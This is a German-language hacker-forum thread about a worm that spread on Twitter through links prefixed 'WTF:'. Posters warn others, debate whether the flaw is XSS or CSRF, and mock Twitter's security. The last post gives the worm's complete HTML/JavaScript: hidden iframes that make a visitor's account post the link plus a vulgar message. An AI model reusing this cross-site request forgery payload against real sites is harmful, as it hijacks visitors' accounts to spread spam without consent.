Kurzmeldung! Wieder ein Wurm auf Twitter unterwegs

[XX]

Klickt nicht auf Links, die nach einem "WTF:" kommen! Don’t Click The WTF Link On Twitter Unless You DO Like Sex With Goats

[BCfu]

Hab hier ne kleine Erklärung dazu gefunden. Meiner Meinung nach schon fast zu simpel um als Wurm durchzugehn...

[epicfa!l]

Irgendwie macht Twitter es den "bösen Menschen" im Moment echt sehr leicht.
Bin ja mal gespannt, wie das wird wenn das neue Update komplett da ist.
Dann werden wieder etliche Sicherheitslücken eröffnet.

Vielleicht sollte Twitter sich mal ein Beispiel an der Post nehmen, und Preisgelder für gefundene Lücken aussetzen.
Finde die Idee eigentlich ziemlich gut, zu lesen hier.

[0x30]

Ist aber dennoch ein Wurm.

[rage666]

Twitter scheint ja echt voller Löcher zu sein.

[stayla]

Twitter sollte mal öfters hier rein schauen xD

[Donut]

Is doch eh schon gefixxt..

[SFX]

Twitter sollte mal öfters hier rein schauen xD

soweit ich das jetzt beurteilen kann geht es da nicht um eine xss, sondern um eine csrf Verwundbarkeit..

Und wenn ich mir die ganzen Webpanels von den uEbEr133337³³ g0il3n Stealern, Bots und was halt sonst noch alles ein Panel hat, scheinen hier nur sehr wenige zu wissen was das ist..

[pima]

Twitter hat immer mehr Nutzer und so langsam wirds für Cracker/Hacker/whatever interessanter Profit daraus zu schlagen, somit wird vermehrt nach Löchern gesucht die früher einfach irrelevant waren.

[wacked]

Code:

<html> <head></head> <body> <script> var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2); </script> </body> </html>

priv7 twitter worm src. no leak plox bro